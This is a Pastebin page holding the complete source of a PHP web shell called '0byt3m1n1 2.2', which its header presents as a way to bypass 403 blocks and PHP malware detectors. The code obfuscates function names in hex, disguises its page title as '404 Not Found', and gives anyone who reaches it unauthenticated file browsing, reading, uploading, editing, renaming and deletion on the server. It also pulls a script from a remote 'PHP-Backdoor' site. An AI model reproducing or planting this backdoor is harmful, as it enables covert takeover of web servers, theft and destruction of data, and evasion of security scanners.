API tools faq
paste
ToKeiChun

0 b y t 3 m 1 n 1 - 2.2 [ Edited ]

ToKeiChun
Nov 21st, 2018
340
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.16 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*
  4. 0 b y t 3 m 1 n 1 - 2.2
  5. Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
  6. */
  7.  
  8. set_time_limit(0);
  9. error_reporting(0);
  10. error_log(0);
  11.  
  12. $sname = "404 Not Found";
  13. $__gcdir = "\x67" . "\x65\x74\x63\x77\x64";
  14. $__fgetcon7s = "\x66\x69\x6c\x65" . "\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
  15. $__scdir = "s" . "\x63\x61\x6e\x64\x69" . "r";
  16. $rm__dir = "\x72\x6d\x64" . "ir";
  17. $un__link = "\x75\x6e" . "\x6c\x69\x6e\x6b";
  18.  
  19. if (get_magic_quotes_gpc()) {
  20. foreach ($_POST as $key => $value) {
  21. $_POST[$key] = stripslashes($value);
  22. }
  23. }
  24.  
  25. echo '<!DOCTYPE html><html><head><title>File Manager</title><link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"><title>'.$sname.'</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script><link href="//amiqul.github.io/CSS/mini.css" rel="stylesheet" type="text/css"></head><body>';
  26.  
  27. echo '<div style="color:#51F5F5;margin-top:0;"><h1><center>' . $sname . '</center></h1></div><tr><td><font color="#00ff00"><center>'.php_uname().'</center></font><br>';
  28. if (isset($_GET['path'])) {
  29. $path = $_GET['path'];
  30. chdir($_GET['path']);
  31. } else {
  32. $path = $__gcdir();
  33. }
  34. $path = str_replace("\\", "/", $path);
  35. $paths = explode("/", $path);
  36. echo '<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>';
  37. echo "<font style='font-size:13px;'>Path: ";
  38. foreach ($paths as $id => $pat) {
  39. echo "<a style='font-size:13px;' href='?path=";
  40. for ($i = 0; $i <= $id; $i++) {
  41. echo $paths[$i];
  42. if ($i != $id) {
  43. echo "/";
  44. }
  45. }
  46. echo "'>$pat</a>/";
  47. }
  48. echo '<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ffffff;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">';
  49. if (isset($_FILES['file'])) {
  50. if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
  51. echo '<center><font color="#00ff00">Upload OK!</font></center><br/>';
  52. } else {
  53. echo '<center><font color="red">Upload FAILED!</font></center><br/>';
  54. }
  55. }
  56. echo '</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">';
  57. echo '';
  58. if (isset($_GET['filesrc'])) {
  59. echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: ';
  60. echo "" . basename($_GET['filesrc']);
  61. "";
  62. echo '</tr></td></table><br />';
  63. echo ("<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>");
  64. } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
  65. echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
  66. if ($_POST['opt'] == 'rename') {
  67. if (isset($_POST['newname'])) {
  68. if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
  69. echo '<center><font color="#00ff00">Rename OK!</font></center><br />';
  70. } else {
  71. echo '<center><font color="red">Rename Failed!</font></center><br />';
  72. }
  73. $_POST['name'] = $_POST['newname'];
  74. }
  75. echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
  76. } elseif ($_POST['opt'] == 'edit') {
  77. if (isset($_POST['src'])) {
  78. $fp = fopen($_POST['path'], 'w');
  79. if (fwrite($fp, $_POST['src'])) {
  80. echo '<center><font color="#00ff00">Edit File OK!.</font></center><br />';
  81. } else {
  82. echo '<center><font color="red">Edit File Failed!.</font></center><br />';
  83. }
  84. fclose($fp);
  85. }
  86. echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
  87. }
  88. echo '</center>';
  89. } else {
  90. echo '</table><br /><center>';
  91. if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
  92. if ($_POST['type'] == 'dir') {
  93. if ($rm__dir($_POST['path'])) {
  94. echo '<center><font color="#00ff00">Dir Deleted!</font></center><br />';
  95. } else {
  96. echo '<center><font color="red">Delete Dir Failed!</font></center><br />';
  97. }
  98. } elseif ($_POST['type'] == 'file') {
  99. if ($un__link($_POST['path'])) {
  100. echo '<font color="#00ff00">Delete File Done.</font><br />';
  101. } else {
  102. echo '<font color="red">Delete File Error.</font><br />';
  103. }
  104. }
  105. }
  106. echo '</center>';
  107. $_scdir = $__scdir($path);
  108. echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>';
  109. foreach ($_scdir as $dir) {
  110. if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')
  111. continue;
  112. echo "<tr><td>[D] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>";
  113. if (is_writable("$path/$dir"))
  114. echo '<font color="#00ff00">';
  115. elseif (!is_readable("$path/$dir"))
  116. echo '<font color="red">';
  117. echo perms("$path/$dir");
  118. if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
  119. echo '</font>';
  120. echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
  121. echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
  122. }
  123. foreach ($_scdir as $file) {
  124. if (!is_file("$path/$file"))
  125. continue;
  126. $size = filesize("$path/$file") / 1024;
  127. $size = round($size, 3);
  128. if ($size >= 1024) {
  129. $size = round($size / 1024, 2) . ' MB';
  130. } else {
  131. $size = $size . ' KB';
  132. }
  133. echo "<tr><td>[F] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>" . $size . "</center></td><td><center>";
  134. if (is_writable("$path/$file"))
  135. echo '<font color="#00ff00">';
  136. elseif (!is_readable("$path/$file"))
  137. echo '<font color="red">';
  138. echo perms("$path/$file");
  139. if (is_writable("$path/$file") || !is_readable("$path/$file"))
  140. echo '</font>';
  141. echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
  142. echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
  143. }
  144. echo '</table></div>';
  145. }
  146. function perms($file)
  147. {
  148. $perms = fileperms($file);
  149. if (($perms & 0xC000) == 0xC000) {
  150. $info = 's';
  151. } elseif (($perms & 0xA000) == 0xA000) {
  152. $info = 'l';
  153. } elseif (($perms & 0x8000) == 0x8000) {
  154. $info = '-';
  155. } elseif (($perms & 0x6000) == 0x6000) {
  156. $info = 'b';
  157. } elseif (($perms & 0x4000) == 0x4000) {
  158. $info = 'd';
  159. } elseif (($perms & 0x2000) == 0x2000) {
  160. $info = 'c';
  161. } elseif (($perms & 0x1000) == 0x1000) {
  162. $info = 'p';
  163. } else {
  164. $info = 'u';
  165. }
  166. $info .= (($perms & 0x0100) ? 'r' : '-');
  167. $info .= (($perms & 0x0080) ? 'w' : '-');
  168. $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
  169. $info .= (($perms & 0x0020) ? 'r' : '-');
  170. $info .= (($perms & 0x0010) ? 'w' : '-');
  171. $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
  172. $info .= (($perms & 0x0004) ? 'r' : '-');
  173. $info .= (($perms & 0x0002) ? 'w' : '-');
  174. $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
  175. return $info;
  176. }
  177. echo '<br><center>&copy; <span id="footer"></span> 2018.</center><br>';
  178. echo '<script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script>';
  179. echo '</body></html><!-- EOF -->';
  180. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!